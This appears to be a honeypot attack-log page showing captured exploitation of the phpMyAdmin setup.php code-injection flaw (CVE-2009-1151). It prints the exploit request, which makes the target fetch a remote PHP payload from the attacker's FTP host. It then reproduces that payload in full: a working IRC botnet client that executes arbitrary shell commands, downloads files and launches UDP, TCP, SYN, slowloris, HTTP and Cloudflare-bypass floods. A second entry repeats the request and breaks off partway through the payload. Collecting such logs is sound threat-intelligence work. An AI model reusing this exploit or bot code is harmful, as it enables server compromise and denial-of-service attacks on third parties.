Help on available search operators
Operators
tag: filter by relevant keywords (e.g., shellshock)
port: filter by destination port
attacker: filter by attacker IP address
country: filter by attacker country (2 letters)
since: filter since provided date (dd/mm/yyyy format)
plugin: filter by plugin ID
resource: filter requests with a resource with the given MD5
Hints
The minus operator - can be used to exclude the results containing a given keyword.
You can combine different operators, or provide multiple values for each one using comma as separator.
e.g., port:80,8080
e.g., port:80 -scripts/setup.php
e.g., upload?org.apache.catalina.filters port:8080
1-10 of 6216036 results (621604 pages)
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
195.154.86.34
Dest. port: 80
Time: 20/08/2019 22:41:16
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS12876 ONLINE S.A.S.
Location: Île-de-France, Clichy-sous-Bois (zipcode 93390)
rDNS: 195-154-86-34.rev.poneytelecom.eu
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.CVE
CVE-2009-1151Author
Adrian "pagvac" PastorPlugin ID
oosheefee1baixeinief5nociu5shohhPOST /phpmyadmin/scripts/setup.php HTTP/1.1
Content-Length: 238
cookie2: $Version="1"
Host: 28.34.203.167
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://28.34.203.167/phpmyadmin/scripts/setup.php
cookie: phpMyAdmin=057cc0957a214ba23a3b4d124f889ac2
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=61bd6ddddc4a7aa715855e90d8f9c2ee&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A29%3A%22ftp%3A%2F%2F195%2E154%2E86%2E34%2Fpub%2Fx%2Ephp%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: b4e8a307ebdedcc21fffdd8628b2d881
Type: text/x-php
Size: 37412
URL: ftp://195.154.86.34/pub/x.php
<?php
$cfg = array(
"server" => "195.154.86.34",
"port" => "6969",
"key" => "",
"prefix" => "VNSTAT|",
"maxrand" => "8",
"chan" => "#b0atn3t",
"trigger" => ".",
"hostauth" => "*"
);
set_time_limit(0);
error_reporting(0);
$dir = getcwd();
$uname = @php_uname();
function whereistmP() {
$uploadtmp = ini_get('upload_tmp_dir');
$uf = getenv('USERPROFILE');
$af = getenv('ALLUSERSPROFILE');
$se = ini_get('session.save_path');
$envtmp = (getenv('TMP')) ? getenv('TMP') : getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))
return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))
return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))
return '/var/tmp';
if(is_dir($uf) && is_writable($uf))
return $uf;
if(is_dir($af) && is_writable($af))
return $af;
if(is_dir($se) && is_writable($se))
return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))
return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))
return $envtmp;
return '.';
}
function srvshelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$n = uniqid('NJ');
$cmd = (empty($_SERVER['ComSpec'])) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec'];
win32_create_service(array(
'service' => $n,
'display' => $n,
'path' => $cmd,
'params' => "/c $command >\"$name\""
));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res = $api->WinExec("cmd.exe /c $command >\"$name\"", 0);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command, $ws) {
$exec = $ws->exec("cmd.exe /c $command");
$so = $exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command) {
$perl = new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec = ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command) {
$exec = $output = '';
$dep[] = array(
'pipe',
'r'
);
$dep[] = array(
'pipe',
'w'
);
if (function_exists('passthru')) {
ob_start();
@passthru($command);
$exec = ob_get_contents();
ob_clean();
ob_end_clean();
} elseif (function_exists('system')) {
$tmp = ob_get_contents();
ob_clean();
@system($command);
$output = ob_get_contents();
ob_clean();
$exec = $tmp;
} elseif (function_exists('exec')) {
@exec($command, $output);
$output = join("\n", $output);
$exec = $output;
} elseif(function_exists('shell_exec'))
$exec = @shell_exec($command);
elseif (function_exists('popen')) {
$output = @popen($command, 'r');
while (!feof($output)) {
$exec = fgets($output);
}
pclose($output);
} elseif (function_exists('proc_open')) {
$res = @proc_open($command, $dep, $pipes);
while (!feof($pipes[1])) {
$line = fgets($pipes[1]);
$output .= $line;
}
$exec = $output;
proc_close($res);
} elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = winshelL($command);
elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = srvshelL($command);
elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = ffishelL($command);
elseif(extension_loaded('perl'))
$exec = perlshelL($command);
return $exec;
}
class pBot {
public $config = '';
public $user_agents = array(
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2",
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00"
);
public $charset = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
public $users = array();
public function start($cfg) {
$this->config = $cfg;
while (true) {
if(!($this->conn = fsockopen($this->config['server'], $this->config['port'], $e, $s, 30)))
$this->start($cfg);
$ident = $this->config['prefix'];
$alph = range("0", "9");
for($i = 0; $i < $this->config['maxrand']; $i++)
$ident .= $alph[rand(0, 9)];
$this->send("USER " . $ident . " 127.0.0.1 localhost :" . php_uname() . "");
$this->set_nick();
$this->main();
}
}
public function main() {
while (!feof($this->conn)) {
if (function_exists('stream_select')) {
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if ($changed == 0) {
fwrite($this->conn, "PING :lelcomeatme\r\n");
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0)
break;
}
}
$this->buf = trim(fgets($this->conn, 512));
$cmd = explode(" ", $this->buf);
if (substr($this->buf, 0, 6) == "PING :") {
$this->send("PONG :" . substr($this->buf, 6));
continue;
}
if (isset($cmd[1]) && $cmd[1] == "001") {
$this->join($this->config['chan'], $this->config['key']);
continue;
}
if (isset($cmd[1]) && $cmd[1] == "433") {
$this->set_nick();
continue;
}
if ($this->buf != $old_buf) {
$mcmd = array();
$msg = substr(strstr($this->buf, " :"), 2);
$msgcmd = explode(" ", $msg);
$nick = explode("!", $cmd[0]);
$vhost = explode("@", $nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0], 1);
$host = $cmd[0];
if($msgcmd[0] == $this->nick)
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i + 1];
else
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i];
if (count($cmd) > 2) {
switch ($cmd[1]) {
case "PRIVMSG":
if ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*") {
if (substr($mcmd[0], 0, 1) == ".") {
switch (substr($mcmd[0], 1)) {
case "mail":
if (count($mcmd) > 4) {
$header = "From: <" . $mcmd[2] . ">";
if (!mail($mcmd[1], $mcmd[3], strstr($msg, $mcmd[4]), $header)) {
$this->privmsg($this->config['chan'], "[\2mail\2]: failed sending.");
} else {
$this->privmsg($this->config['chan'], "[\2mail\2]: sent.");
}
}
break;
case "dns":
if (isset($mcmd[1])) {
$ip = explode(".", $mcmd[1]);
if (count($ip) == 4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyaddr($mcmd[1]));
} else {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyname($mcmd[1]));
}
}
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
$safemode = "on";
} else {
$safemode = "off";
}
$uname = php_uname();
$this->privmsg($this->config['chan'], "[\2info\2]: " . $uname . " (safe: " . $safemode . ")");
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg, $mcmd[1]));
break;
case "eval":
ob_start();
eval(strstr($msg, $mcmd[1]));
$exec = ob_get_contents();
ob_end_clean();
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = exec($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "cmd":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = Exe($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "ud.server":
if (count($mcmd) > 2) {
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if (isset($mcmcd[3])) {
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'], "[\2update\2]: info updated " . $mcmd[1] . ":" . $mcmd[2] . " pass: " . $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "[\2update\2]: switched server to " . $mcmd[1] . ":" . $mcmd[2]);
}
fclose($this->conn);
}
break;
case "download":
if (count($mcmd) > 2) {
if (!$fp = fopen($mcmd[2], "w")) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not open output file.");
} else {
if (!$get = file($mcmd[1])) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not download \2" . $mcmd[1] . "\2");
} else {
for ($i = 0; $i <= count($get); $i++) {
fwrite($fp, $get[$i]);
}
$this->privmsg($this->config['chan'], "[\2download\2]: file \2" . $mcmd[1] . "\2 downloaded to \2" . $mcmd[2] . "\2");
}
fclose($fp);
}
} else {
$this->privmsg($this->config['chan'], "[\2download\2]: use .download http://your.host/file /tmp/file");
}
break;
case "udpflood":
if (count($mcmd) > 4) {
$this->udpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
}
break;
case "tcpconn":
if (count($mcmd) > 5) {
$this->tcpconn($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "rudy":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "slowread":
if (count($mcmd) > 3) {
$this->slowRead($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "slowloris":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "synflood":
if (count($mcmd) > 3) {
$this->synflood($mcmd[1], $mcmd[2], $mcmd[3]);
}
case "l7":
if (count($mcmd) > 3) {
if ($mcmd[1] == "get") {
$this->attack_http("GET", $mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "post") {
$this->attack_post($mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "head") {
$this->attack_http("HEAD", $mcmd[2], $mcmd[3]);
}
}
break;
case "syn":
if (count($mcmd) > 2) {
$this->syn($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: syn host port time [delaySeconds]");
}
break;
case "tcpflood":
if (count($mcmd) > 2) {
$this->tcpflood($mcmd[1], $mcmd[2], $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "syntax: tcpflood host port time");
}
break;
case "httpflood":
if (count($mcmd) > 2) {
$this->httpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5]);
} else {
$this->privmsg($this->config['chan'], "syntax: httpflood host port time [method] [url]");
}
break;
case "proxyhttpflood":
if (count($mcmd) > 2) {
$this->proxyhttpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: proxyhttpflood targetUrl(with http://) proxyListUrl time [method]");
}
break;
case "cloudflareflood":
print_r($mcmd);
if (count($mcmd) > 2) {
$this->cloudflareflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5], $mcmd[6]);
} else {
$this->privmsg($this->config['chan'], "syntax: cloudflareflood host port time [method] [url] [postFields]");
}
break;
}
}
}
break;
}
}
}
}
}
public function send($msg) {
fwrite($this->conn, $msg . "\r\n");
}
public function join($chan, $key = NULL) {
$this->send("JOIN " . $chan . " " . $key);
}
public function privmsg($to, $msg) {
$this->send("PRIVMSG " . $to . " :" . $msg);
}
public function notice($to, $msg) {
$this->send("NOTICE " . $to . " :" . $msg);
}
public function set_nick() {
$fp = fsockopen("freegeoip.net", 80, $dummy, $dummy, 30);
if(!$fp)
$this->nick = "[UKN]";
else {
fclose($fp);
$ctx = stream_context_create(array(
'http' => array(
'timeout' => 30
)
));
$buf = file_get_contents("http://freegeoip.net/json/", 0, $ctx);
if(!strstr($buf, "country_code"))
$this->nick = "[UKN]";
else {
$code = strstr($buf, "country_code");
$code = substr($code, 12);
$code = substr($code, 3, 2);
$this->nick = "[" . $code . "]";
}
}
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$this->nick .= "[WIN32]";
else
$this->nick .= "[LINUX]";
if (isset($_SERVER['SERVER_SOFTWARE'])) {
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "apache"))
$this->nick .= "[A]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "iis"))
$this->nick .= "[I]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "xitami"))
$this->nick .= "[X]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "nginx"))
$this->nick .= "[N]";
else
$this->nick .= "[U]";
} else {
$this->nick .= "[C]";
}
$this->nick .= $this->config['prefix'];
for($i = 0; $i < $this->config['maxrand']; $i++)
$this->nick .= mt_rand(0, 9);
$this->send("NICK " . $this->nick);
}
public function cloudflareflood($host, $port, $time, $method="GET", $url="/", $post=array()) {
$this->privmsg($this->config['chan'], "[\2CloudFlareFlood Started!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 300\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n";
//Cloudflare Bypass
$res = curl($host, null, $user_agent, true);
//Cloudflare Bypass
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare detected!...\2]");
//Get the math calc
$math_calc = get_between($res, "a.value = ", ";");
if ($math_calc) {
$math_result = (int) eval("return ($math_calc);");
if (is_numeric($math_result)) {
$math_result += strlen($host); //Domain lenght
//Send the CloudFlare's form
$getData = "cdn-cgi/l/chk_jschl";
$getData .= "?jschl_vc=".get_between($res, 'name="jschl_vc" value="', '"');
$getData .= "&jschl_answer=".$math_result;
$res = curl($host.$getData, null, $user_agent);
//Cloudflare Bypassed?
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare not bypassed...\2]");
return false;
} else {
$bypassed = true;
//Cookie read
$cookie = trim(get_between(file_get_contents("cookie.txt"), "__cfduid", "\n"));
$packet .= "Cookie: __cfduid=".$cookie."\r\n\r\n";
}
}
}
} else {
$this->privmsg($this->config['chan'], "[\2CloudFlare not detected...\2]");
}
if ($bypassed) {
$this->privmsg($this->config['chan'], "[\2CloudFlare bypassed!\2]");
}
$this->privmsg($this->config['chan'], "[\2Flodding...\2]");
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2Bitch Got Nulled!\2]");
}
public function httpflood($host, $port, $time, $method="GET", $url="/") {
$this->privmsg($this->config['chan'], "[\2HttpFlood Started!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2HttpFlood Finished!\2]");
}
public function proxyhttpflood($url, $proxyListUrl, $time, $method="GET") {
$this->privmsg($this->config['chan'], "[\2ProxyHttpFlood Started!\2]");
$timei = time();
//Grabbing proxy
$proxyList = curl($proxyListUrl);
if ($proxyList) {
$proxies = explode("\n", $proxyList);
if (count($proxies)) {
shuffle($proxies);
$proxies[0] = trim($proxies[0]);
$proxy = explode(":", $proxies[0]);
$proxyIp = $proxy[0];
$proxyPort = $proxy[1];
if ($proxyPort && $proxyIp) {
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($proxyIp, $proxyPort, $errno, $errstr, 1);
fwrite($handle, $packet);
}
} else {
$this->privmsg($this->config['chan'], "[\2Malformed proxy!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2No proxies found!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2Proxy List not found!\2]");
}
$this->privmsg($this->config['chan'], "[\2ProxyHttpFlood Finished (Proxy: ".$proxies[0].")!\2]");
}
public function tcpflood($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2TCP Started!\2]");
$timei = time();
$packet = "";
for ($i = 0; $i < 65000; $i++) {
$packet .= $this->charset[rand(0, strlen($this->charset))];
}
while (time() - $timei < $time) {
$handle = fsockopen("tcp://".$host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2TCP Finished!\2]");
}
public function slowRead($host, $port, $time) {
$timei = time();
$fs = array();
//initialize get headers.
$this->privmsg($this->config['chan'], "[\2Started Slowread!\2]");
$headers = "GET / HTTP/1.1\r\nHost: {$host}\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\r\n\r\n";
while (time() - $timei < $time) {
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
while (time() - $timei < $time) {
for ($i = 0; $i < count($fs); $i++) {
if (!$fs[$i]) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
fread($fs[$i], 1);
}
sleep(mt_rand(0.5, 2));
}
}
$this->privmsg($this->config['chan'], "[\2Finished Slowread\2]");
}
public function attack_http($mthd, $server, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Started On : $server!\2]");
$request = "$mthd / HTTP/1.1\r\n";
$request .= "Host: $server\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Accept: *.*\r\n";
$timei = time();
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Finished!\2]");
}
public function attack_post($server, $host, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Started On : $server!\2]");
$request = "POST /" . md5(rand()) . " HTTP/1.1\r\n";
$request .= "Host: $host\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Content-Length: 1000000000\r\n";
$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Accept: *.*\r\n";
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
}
}
fclose($sockfd);
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Finished!\2]");
}
public function doSlow($host, $time) {
$this->privmsg($this->config['chan'], "[\2SlowLoris Started!\2]");
$timei = time();
$i = 0;
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
$out = "POST / HTTP/1.1\r\n";
$out .= "Host: {$host}\r\n";
$out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
$out .= "Content-Length: " . rand(1, 1000) . "\r\n";
$out .= "X-a: " . rand(1, 10000) . "\r\n";
if (@fwrite($fs[$i], $out)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2SlowLoris Finished!\2]");
}
public function syn($host, $port, $time, $delay=1) {
$this->privmsg($this->config['chan'], "[\2SYN Started!\2]");
$timei = time();
$socks = array();
while (time() - $timei < $time) {
$numsocks++;
$socks[$numsocks] = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!$socks[$numsocks]) continue;
@socket_set_nonblock($socks[$numsocks]);
for ($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
}
$this->privmsg($this->config['chan'], "[\2SYN Finished (".$numsocks." socks created)!\2]");
}
public function synflood($host, $port, $delay) {
$this->privmsg($this->config['chan'], "[\2synFlood Started!\2]");
$socks = array();
$numsocks = 0;
$numsocks++;
$socks[$numsocks] = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if(!$socks[$numsocks])
continue;
@socket_set_nonblock($socks[$numsocks]);
for($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
for ($j = 0; $j < $numsocks; $j++) {
if($socks[$j])
@socket_close($socks[$j]);
}
$this->privmsg($this->config['chan'], "[\2SynFlood Finished!\2]: Config - For $host:$port.");
}
public function udpflood($host, $port, $time, $packetsize) {
$this->privmsg($this->config['chan'], "[\2UdpFlood Started!\2]");
$packet = "";
for ($i = 0; $i < $packetsize; $i++) {
$packet .= chr(rand(1, 256));
}
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://" . $host, $port, $e, $s, 5);
while (true) {
fwrite($fp, $packet);
fflush($fp);
if ($i % 100 == 0) {
if($end < time())
break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'], "[\2UdpFlood Finished!\2]: " . $env . " MB sent / Average: " . $vel . " MB/s ");
}
public function tcpconn($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2TcpConn Started!\2]");
$end = time() + $time;
$i = 0;
while ($end > time()) {
$fp = fsockopen($host, $port, $dummy, $dummy, 1);
fclose($fp);
$i++;
}
$this->privmsg($this->config['chan'], "[\2TcpFlood Finished!\2]: sent " . $i . " connections to $host:$port.");
}
}
$bot = new pBot;
$bot->start($cfg);
function curl($url, $post=array(), $user_agent="", $deleteCookies=false) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
if ($user_agent) {
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
}
if (!empty($post)) {
curl_setopt($ch,CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS, $post);
}
if ($deleteCookies) {
file_put_contents("cookie.txt", "");
}
curl_setopt ($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt ($ch, CURLOPT_COOKIEFILE, "cookie.txt");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
//$statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return $result;
}
function get_between($string,$start,$end) {
$string = " ".$string;
$ini = strpos($string, $start);
if($ini==0) return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
?>
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
195.154.86.34
Dest. port: 80
Time: 20/08/2019 09:01:04
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS12876 ONLINE S.A.S.
Location: Île-de-France, Clichy-sous-Bois (zipcode 93390)
rDNS: 195-154-86-34.rev.poneytelecom.eu
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.CVE
CVE-2009-1151Author
Adrian "pagvac" PastorPlugin ID
oosheefee1baixeinief5nociu5shohhPOST /phpmyadmin/scripts/setup.php HTTP/1.1
Content-Length: 238
cookie2: $Version="1"
Host: 28.34.203.167
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://28.34.203.167/phpmyadmin/scripts/setup.php
cookie: phpMyAdmin=057cc0957a214ba23a3b4d124f889ac2
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=61bd6ddddc4a7aa715855e90d8f9c2ee&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A29%3A%22ftp%3A%2F%2F195%2E154%2E86%2E34%2Fpub%2Fx%2Ephp%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: b4e8a307ebdedcc21fffdd8628b2d881
Type: text/x-php
Size: 37412
URL: ftp://195.154.86.34/pub/x.php
<?php
$cfg = array(
"server" => "195.154.86.34",
"port" => "6969",
"key" => "",
"prefix" => "VNSTAT|",
"maxrand" => "8",
"chan" => "#b0atn3t",
"trigger" => ".",
"hostauth" => "*"
);
set_time_limit(0);
error_reporting(0);
$dir = getcwd();
$uname = @php_uname();
function whereistmP() {
$uploadtmp = ini_get('upload_tmp_dir');
$uf = getenv('USERPROFILE');
$af = getenv('ALLUSERSPROFILE');
$se = ini_get('session.save_path');
$envtmp = (getenv('TMP')) ? getenv('TMP') : getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))
return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))
return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))
return '/var/tmp';
